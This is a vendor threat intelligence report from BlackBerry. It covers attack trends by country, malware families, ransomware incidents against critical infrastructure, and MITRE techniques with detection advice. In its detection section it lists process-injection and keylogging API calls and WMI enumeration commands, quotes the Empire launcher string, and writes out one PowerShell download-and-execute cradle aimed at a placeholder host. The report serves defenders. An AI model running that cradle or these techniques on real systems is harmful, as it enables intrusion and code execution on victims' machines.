Global Threat Intelligence Report

In Figure 3 above, you’ll see how the total number of attacks stopped and unique malware hashes found varies by country over time, from the previous reporting period to the present reporting period.

• The United States, Japan and Peru remain the same in terms of overall number of attacks stopped, whereas South Korea climbs from number three to number two in ranking for unique malware, overtaking Japan.
• Additionally in the Asia-Pacific region, Australia was a new entry for most attacks stopped this reporting period, ranking second only behind the United States. Australia ranked fourth in the number of unique hashes targeting customers’ systems.      
• BlackBerry’s telemetry recorded that Canadian-based entities experienced fewer attacks this period, dropping from second to fifth place. In our unique malware data during this reporting period, Canada maintained its fifth-place standing.

Australia’s recent entry into our top five list of most attacks stopped may stem from recent geopolitical events. In November 2023, the Australian Signals Directorate (ASD) published its 2022-2023 Annual Cyber Threat Report, which revealed key trends in cybercrime facing Australian governments, business and individuals. In their report, ASD identified the AUKUS partnership, with its focus on nuclear-powered submarines and other advanced military capabilities, as “likely a target for state actors looking to steal intellectual property for their own military programs.”  The ASD director went on to state that as Australia “becomes more military capable, that is obviously going to draw attention in terms of the areas that other actors are going to be interested in.”

ASD additionally reported that close to 94,000 reports of cybercriminal activity were made to law enforcement by individuals and businesses across Australia in 2023, an increase of 23 percent from the previous year, with ransomware alone causing up to $3 billion in damages to the Australian economy every year. Losses for small businesses in Australia targeted by cyberattacks averaged almost $46,000 per business last year, up from the previous financial year's $30,000.

To help counter this surge in cyber activity, ASD announced the launch of its “Act Now, Stay Secure” cybersecurity awareness-raising campaign, which identified key cyberthreats to individuals and small-to-medium businesses. The campaign underscored the need to "act now" to address cyberthreats, stating that "for too long, Australian citizens and businesses have been left to fend for themselves against global cyber threats," and sets out a bold vision to be "a world leader in cyber security by 2030."

Cyberthreats that target this diverse array of sectors have the potential to cause mass disruption and incapacitate or compromise critical assets, systems and networks of their respective entities. This in turn can have a serious effect on the economic security, public health and the social stability of a nation regardless of scale of the attack, economic development of the nation or its standard of living.

BlackBerry observed several malware families targeting various sectors within our internal telemetry during this reporting period:

PrivateLoader is a malicious downloader family, written in C++ and observed continuously since being first discovered in 2021. The malware is often used to facilitate the deployment of infostealers onto a victim’s device. According to our telemetry, PrivateLoader was observed within this reporting period attempting to target systems related to financial services, food and agriculture and government facilities.  

PrivateLoader is known for distributing a wide range of malicious payloads of varying complexities. The malware’s distribution network is managed though an underground pay-per-install (PPI) service, which finances the continued use and development of the malware and its infrastructure.

RisePro is a commodity infostealer that has been seen in the wild since 2022. Through our investigations of PrivateLoader's indicators of compromise (IoCs), we noticed that several samples attempted to deploy malware through its distribution service, including RisePro. Once on a victim’s device, RisePro will attempt to communicate with its command-and-control (C2) and illicitly obtain private and sensitive data before sending it to the attacker’s servers. This stolen data can be sold to another malicious third-party or used in secondary activities targeting the affected victim.

SmokeLoader is a multi-purpose malware that has been noted by BlackBerry in previous reporting periods. The malware acts as an independent backdoor but is often used as a delivery mechanism for other malware. SmokeLoader is often inadvertently downloaded via phishing documents or links before getting a foothold on a targeted device. This malware was observed targeting the energy sector this reporting period.

Notably within the reporting period, Ukraine’s National Cyber Security Coordination Centre (NCSCC) saw a surge of attacks related to SmokeLoader also targeting government organizations. What makes SmokeLoader so potent is its ability to deploy various other malware onto the victim’s device.

SmokeLoader has been known in the past to drop a plethora of infostealers such as Amadey, RedLine and Vidar, but additionally to act as a delivery mechanism for ransomware. The threat group behind 8Base ransomware has previously used SmokeLoader to distribute a variant of Phobos ransomware.

PikaBot is a stealthy and evasive malware that emerged in early 2023 and has been a prominent threat throughout the year. This modular malware shares many similarities with the QakBot Trojan and can receive various commands from its C2. During this reporting period, PikaBot was identified on government and energy sector-based entities.

PikaBot is persistent and has numerous functions to prevent it from being analyzed by threat researchers, including several anti-sandbox/anti-analysis checks. Once on a victim’s device, the malware can receive and run commands to collect valuable device information and execute orders received from its C2.

Commodity infostealers have also been moderately active throughout this quarter. Many infostealers are sold as MaaS and utilized in large-scale campaigns.

LummaStealer (LummaC2) is a C-based infostealer that focuses on exfiltrating private and sensitive data from the victim device. LummaStealer has a notable ability to obtain cryptocurrency wallet data and two-factor authentication (2FA) browser extension data. Throughout the reporting period, LummaStealer was observed by BlackBerry targeting financial institutions and government entities.

RecordBreaker (RaccoonStealer) is another widely distributed infostealer that was temporarily shut down due to the arrest of a core threat group member in 2022. However, the group returned in mid-2023 with an updated version. Our telemetry recorded RecordBreaker targeting healthcare institutions, both in this reporting period and the prior one.

RedLine infostealer has been one of BlackBerry’s most observed threats throughout previous reports. The .NET compiled stealer has a strong focus on credential scraping and stealing from several software and digital platforms, with a focus on credit card information and cryptocurrency wallets. 

RedLine is widely available via underground forums sold as a subscription or as a standalone product for a relatively inexpensive cost. The malware family primarily targeted communications and government sectors this reporting period.

Throughout this reporting period the broader cyberthreat landscape was also highly active, witnessing a number of noteworthy attacks against critical infrastructure organizations worldwide.

In mid-October, the Illinois-based Morrison Community Hospital was the alleged victim of a breach by the BlackCat/ALPHV ransomware gang with an appearance on its dark website. The hospital itself published a security notification several weeks later on their site stating that they had suffered an incident in late September that “involved an unauthorized party gaining access to our network environment.” It did not, however, mention the name of the attacker or if any files were locked or pilfered. 

In November, the Slovenian state-owned energy entity Holding Slovenske Elektrarne (HSE) was the victim of a ransomware attack. As the provider of approximately 60 percent of the country’s energy production, it was fortunate that the breach and file encryption did not impede the production or output of power.

Although the attackers in this case were not officially named, the Rhysida ransomware group may have been the culprit. This group claimed to have victimized HSE on their website several weeks later.

November also brought news of another state-owned entity being subjected to an attack and breach from a ransomware gang. This time it was a largely state-owned telecommunications services company, which had been the victim of an attack a month prior by the RansomEXX gang, with up to 6GB of data pilfered. This included many different forms of personally identifiable information (PII). Reports also indicated that a CSV data file with information on over a million of their customers was leaked on the dark web.

RansomEXX (a.k.a. Defray and Defray777) is a ransomware family that was first seen in 2018. There are both Windows and Linux variants of this malware family, which was notably used in high-profile exploits on government agencies and manufacturers. RansomEXX runs as a ransomware-as-a-service (RaaS) model, with a variant named RansomEXX2 written in the programming language Rust surfacing in 2022.

In the United States, CISA issued an alert on November 28, 2023, in response to what CISA called “active exploitation of Unitronics programmable logic controllers (PLCs).” These are computers used in water and wastewater facilities. The alert specified that these types of facilities were being actively targeted by cyberthreat actors and advised other water and wastewater facilities to follow all recommended guidelines and precautionary measures.

In a continuation of activity mentioned in the November 2023 edition of our Global Threat Intelligence Report, the LockBit gang continued to target critical infrastructure organizations, despite an attempted takedown by the FBI in February 2024. On Christmas Eve of 2023, the LockBit gang was implicated in an attack on the German hospital network Katholische Hospitalvereinigung Ostwestfalen gGmbH (KHO). The early morning attack successfully breached and encrypted file data resulting in severe disruption to the services of three different KHO hospitals.

The LockBit gang was also seen targeting other entities and sectors within critical infrastructure by leveraging the exploitation of CVE-2023-4966 — the Citrix Bleed vulnerability — to gain initial access. This resulted in the U.S. government issuing a joint Cybersecurity Advisory (CSA) suggesting organizations patch and follow all recommended mitigation guidelines and best practices.

For those victimized by LockBit in the past, file recovery tools are now available. The FBI, Europol, the Japanese Police and the National Crime Agency have collaborated to make these tools available on the “No More Ransom” portal, now available in 37 languages.

Commercial enterprises, particularly manufacturing and retail, were the targets of numerous attacks over the last four months.

In November, Israeli retailers were reportedly hit by the hacktivist group Cyber Toufan, which also struck the Israeli hosting company Signature-IT. Since November 2023, in the context of the ongoing Israel-Hamas conflict in Gaza, the group has reportedly launched hundreds of cyber operations against Israeli targets. Many global retailers, such as IKEA, were heavily affected by the Signature-IT attack. In a post on their Telegram channel, the group claimed to have compromised over 150 victims. They reportedly wiped and destroyed over 1,000 servers and critical databases.  

December brought a reminder that the biggest threat to companies is often their own complacency. An unprotected Internet-accessible database hosted by the Real Estate Wealth Network was discovered by malicious actors and plundered. The database had 1.16 TB of data – roughly 1.5 billion records – including the names of property owners, sellers and investor details. The database represents a central collection of U.S. real-estate data, including government officials’ addresses and even debt information.

The victims of such attacks vary, depending on the goals of the ransomware crime group. At the end of 2023, one of the largest apparel, footwear and clothing manufacturers, VF Corporation, was attacked by the ALPHV (BlackCat) ransomware group. At this time, the investigation is unresolved, but it has been confirmed that the data of 35.5 million customers of brands like North Face, Timberland and Vans was stolen.

The World Economic Forum’s 2024 Global Risk Report ranks the threat of cyber insecurity as among the “most severe global risks anticipated over the next two years.” Armed with increasingly sophisticated techniques, including the leveraging of artificial intelligence (AI), the consensus is that cyberattacks will continue to be highly disruptive and increasingly target critical infrastructure. 

BlackBerry telemetry demonstrates that critical infrastructure entities faced many attacks during this reporting period. Attacks are becoming increasingly sophisticated, with the use of novel malware techniques, including those generated by AI, raising the risk of paralyzing critical infrastructure. Governments around the world have initiated a series of measures aimed at boosting the cyber resilience of critical infrastructure, with a particular emphasis on guarding against risks associated with the malicious use of AI.

While governments recognize that AI has significant potential for good, including enhancing the operational efficiency of critical infrastructure systems, many also fear that the push to optimize efficiency through the deployment of AI-based systems in critical infrastructure could pose serious risks to security.

To prevent this, governments are calling on industry to prioritize security when developing and deploying increasingly powerful AI models:

“Over the last four decades, from the creation of the Internet to the mass adoption of software, to the rise of social media, we have witnessed safety and security being forced to take a back seat as companies prioritize speed to market and features over security. The development and implementation of AI software must break the cycle of speed at the expense of security.”

—CISA Roadmap for AI

Governments around the globe have rushed to develop and issue guidance that encourages a “secure by default” approach to the development and use of powerful AI systems. Other countries and political alliances such as the United Kingdom, Canada, the EU and G7 have also issued guidelines on the responsible development and use of advanced AI systems. This included joint guidelines endorsed by more than 20 national cybersecurity agencies globally emphasizing the need for builders of AI systems to make informed decisions about the design, development, deployment and operation of AI systems in a way that prioritizes security throughout the life cycle of the system.

Also, in October 2023, U.S. President Biden released an Executive Order on “Safe, Secure, and Trustworthy Artificial Intelligence” (EO 14110) which among other things directed CISA to assess potential risks related to the use of AI in critical infrastructure sectors, including ways in which deploying AI may make critical infrastructure systems more vulnerable to failure, physical attacks and cyberattacks.  

In November 2023, BlackBerry announced a landmark cybersecurity deal with the Government of Malaysia, allowing them to leverage the full suite of trusted BlackBerry cybersecurity solutions, in order to strengthen Malaysia’s security posture. As part of this effort, BlackBerry has partnered with the SANS Institute to open a state-of-the-art Cybersecurity Center of Excellence (CCoE) in Kuala Lumpur, the capital city of Malaysia, in 2024. The CCoE will offer specialized training to advance Malaysian cybersecurity capacity and readiness. BlackBerry is thrilled to help build the country’s cybersecurity learning ecosystem — especially in the areas of AI and machine learning — to help grow and upskill Malaysia’s cybersecurity workforce, as well as making the Indo-Pacific region more secure.

Canadian Prime Minister Justin Trudeau said, “Cybersecurity is a key pillar of Canada’s Indo-Pacific Strategy, which aims to advance peace, security, and cooperation in the region. Cybersecurity is a shared challenge that requires international cooperation, which is why we strongly support the BlackBerry Cybersecurity Center of Excellence in Malaysia, an important bilateral partner of Canada. By supporting Malaysia’s future cyber-defenders and establishing stronger regional networks for the sharing of expertise between Canada and Southeast Asia, we can further strengthen the resilience and capacity of our two countries and the wider region to counter, deter and respond to cyber threats.”

Throughout the reporting period, governments and businesses were constantly reminded of the vulnerability of their networks. In September 2023, it was revealed that Chinese hackers had breached Microsoft’s email platform, stealing tens of thousands of emails from U.S. State Department accounts. This followed earlier reports of similar attacks against other U.S. government targets, including the Department of Commerce. Recently, it was also revealed that Canadian authorities working at Global Affairs Canada suffered a “prolonged data security breach.”

As Canada’s Centre for Cyber Security underscored in its most recent “National Cyber Threat Assessment,” critical infrastructure is increasingly at risk from cyberthreat activity. State-sponsored actors are actively seeking to infiltrate these systems, and disruptive technologies, such as AI, may enable new threats. As noted in this report, Australia also suffered multiple high-profile cyberattacks on its critical infrastructure including Australia’s second largest telco, Optus, and largest private health insurer, Medibank.

Neither is industry immune to such threats, and new regulations emerged in 2023 to begin to address this.. For example, in December 2023, a new set of rules requiring publicly-traded companies to disclose ‘material’ cyber incidents to the U.S. Securities and Exchange Commission — within four days — came into effect. In Europe, the EU recently passed the Cyber Resilience Act, which sets forth new cybersecurity requirements for hardware and software products with digital elements sold in the European Union. This is in addition to the extra measures required in the EU’s updated Network and Information Security Directive to help address cybersecurity vulnerabilities to critical infrastructure entities.

Finally, in November 2023, Australia released its Cybersecurity Strategy, which called for a “whole-of-nation” approach to protect critical information, share threat intelligence and promote the use of technology products that are safe and secure.

In the face of the ever-evolving threat landscape, BlackBerry has consistently called for the need to modernize security by replacing legacy technologies (such as VPNs) with modern “zero-trust”-based and AI-driven cybersecurity solutions that continuously assess a device’s security posture to prevent cyberattacks before they happen. Prevention-first cybersecurity technologies that employ a zero-trust approach will become increasingly critical as threat actors develop more sophisticated ways of slipping through traditional or legacy IT security. 

Over the coming year, the threat posed by increasingly sophisticated cyberattacks is likely to escalate. Of particular concern among officials in democratic countries around the world is the extent to which malicious actors will use digital tradecraft to disrupt democratic processes. As an estimated 49 percent of the global population in 64 countries head to the polls to vote in 2024, some experts are starting to ring the alarm bell that electoral processes and infrastructure could also be a prime target. Jen Easterly, director of the U.S. government’s CISA, warned that “generative AI will amplify cybersecurity risks and make it easier, faster and cheaper to flood the country with fake content.”

She went on to note that “With this technology now more available and powerful than ever, its malicious use is poised to test the security of the United States’ electoral process by giving nefarious actors intent on undermining American democracy – including China, Iran, and Russia – the ability to supercharge their tactics.”

The Common Vulnerabilities and Exposures (CVE) system, maintained by The MITRE Corporation, is a catalog of information on publicly known vulnerabilities and exposures. The CVE system is sponsored by the U.S. Department of Homeland Security (DHS) and CISA.

This reporting period has seen the rise of new vulnerabilities found in Cisco^®, Apache^®, Citrix^® and JetBrains^® products. Mitigation methods to these vulnerabilities have already been published, yet certain threat actors have still taken full advantage of unpatched systems.

Understanding threat groups’ high-level techniques can aid in deciding which detection techniques should be prioritized. BlackBerry observed the following top 20 MITRE techniques being used by threat actors in this reporting period.

An upward arrow in the last column indicates that usage of the technique has increased since our last report. A downward arrow indicates that usage has decreased since our last report. An equals (=) symbol means that the technique remains in the same position as in our last report.

Process Injection is a commonly exploited defensive evasion technique which occurs when malicious code is placed within the address space of another running process.

Below are a series of native Windows functions that can be abused by injecting them into a process.

Functions called in order (varies by attack):

• VirtualAlloc(Ex) – Allocating memory in the process
• WriteProcessMemory() – Writing malicious code to the allocated memory
• VirtualProtect – Reprotection of memory with executable permissions
• CreateRemoteThread() – Execute malicious code in the context of another process

Attackers utilize custom information stealing software to record users' inputs to a compromised system through monitoring of the graphical user interface (GUI) or, alternatively, through logging keystrokes.

BlackBerry found that, by monitoring for unusual processes that were performing input captures of any form, it was possible to successfully identify and remediate the threats.

Common behavior that BlackBerry would define as “unusual” includes invalid signatures, child processes spawning from an atypical parent process, and specific Windows API function calls.

Function calls to monitor:

• SetWindowsHook(Ex) – Monitor events like inputs on the desktop
• GetKeyboardState() – Fetch status of virtual key's current state
• GetKeyState() – Fetch status of virtual key's current state
• GetAsyncKeyState() – Fetch status of virtual key's current state

Enumerating system information from a compromised system can provide a threat actor with the context to further identify weaknesses and potential exploitation vectors, in order to escalate privileges and gain unrestricted access to the system.

By creating a baseline of common behavior across the network and watching for outliers, cybersecurity professionals can observe any anomalies.

By abusing Windows Management Instrumentation (WMI), a threat actor can locate information about antivirus software, logical disks, and users, to identify pivot points, or areas of interest/weaknesses for an attacker to exploit. However, such calls are relatively unconventional for the majority of users. Monitoring their occurrence might identify a malicious actor or malware on the victim system.

Below are command lines that may be useful to monitor:

• SELECT * FROM AntiVirusProduct – A WMI command line to enumerate antivirus products present on the system
• wmic OS get OSArchitecture, Version – Utilizes WMI to enumerate system version information
• systeminfo – Provides system information to the user
• driverquery /v – Lists installed drives on the system

Attackers may execute their own malicious code by taking advantage of the dynamic link libraries (DLLs) search order. They do this by positing the malicious payload and the victim’s legitimate application alongside one another. After that, any time that a legitimate executable is run, it will load the malicious binary while the system's normal search order is being leveraged by the attacker.

Furthermore, system locations like the Windows Side-by-Side (SxS) and system folders should be carefully monitored for deletion and replacement of DLLs, a move that more advanced adversaries will attempt to evade modern antivirus/endpoint detection and response (EDR) solutions.

A common way to identify DLL side-loading is to monitor modules being loaded from abnormal locations like the recycle bin, temporary folders, and ordinary system paths.

By using non-application layer protocols, adversaries attempt to evade defenses that are mature and fine-tuned to detect malicious behavior. From a mitigation and prevention standpoint, less common protocols such as ICMP should be monitored for C2 communications.

A secure and risk-mitigated approach that BlackBerry customers can take is to create custom rules to monitor for specific strings on the network layer and use those rules in combination with more advanced behavioral detection rules. By layering preventative measures in conjunction with an adequate security presence, BlackBerry customers and defenders alike can reduce their susceptibility to attacks and heighten their security awareness.

In the last report, the CylanceGUARD team found that the “Common File Archive Exfiltration Staging” technique was abused in all geographical regions where BlackBerry has customers. However, this reporting period we recorded a pattern of PowerShell detections across all regions.

In the EMEA and the NALA regions, the CylanceGUARD team noticed an increase in detections related to PowerShell Empire – “Possible Empire Encoded Payload.” PowerShell Empire is an open-source post-exploit framework which is commonly used by both attackers and legitimate penetration testers/red teams.

The Empire framework essentially focuses on targeting Windows environments using the PowerShell scripting language. This allows an attacker to communicate with the victim’s machine to deliver and receive commands and information from C2 servers.

An early indicator for Empire is the detection of a command such as:

“POWERSHELL -NOP -STA -W 1 -ENC.”  This is the default launcher string in Empire HTTP Listeners.

Note that it is trivial for the attacker to change or obfuscate this value. However, in many cases this value is not changed and hence, makes an effective signature for detection teams and security operations center (SOC) analysts.

In the APAC region, we observed a shift from the tactic Credential Access (TA0006) to Execution (TA0002) as the most commonly-observed threat. PowerShell was again a major presence in our detections. The related MITRE technique observed was Command and Scripting Interpreter: PowerShell (T1059.001). During our investigations, the most commonly observed pattern used by threat actors was a download cradle – this is a single command used for both downloading and code execution.

For example:

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('hxxp://x.x.x.x/test[.]exe’)

– This would download and execute the file test.exe from a possible C2 server.

The pattern of PowerShell being heavily detected in our customer environments highlights the importance of ensuring that organizations have the proper visibility and controls in place to limit abuse related to PowerShell.

As part of the CylanceGUARD offering, our onboarding team (known as ThreatZERO^® consultants) works closely with our customers to ensure that their devices are placed in the recommended policies such as Script Control Block (SCB – PS) to limit an attacker’s ability to abuse utilities such as PowerShell.

This report represents the collaborative efforts of our talented teams and individuals. In particular, we would like to recognize:

Adrian Chambers
Amalkanth Raveendran
David Hegarty
Dean Given
Geoff O’Rourke
Ismael Valenzuela Espejo
Jacob Faires
John de Boer
Kristofer Vandercook
Natalia Capponi
Natasha Rohner
Patryk Matysik
Pedro Drimel
Ronald Welch
Travis Hoxmeier
William Johnson

The information contained in the BlackBerry Global Threat intelligence Report is intended for informational purposes only. BlackBerry does not guarantee or take responsibility for the accuracy, completeness and reliability of any third-party statements or research referenced herein. The analysis expressed in this report reflects the current understanding of available information by our research analysts and may be subject to change as additional information is made known to us. Readers are responsible for exercising their own due diligence when applying this information to their private and professional lives. BlackBerry does not condone any malicious use or misuse of information presented in this report.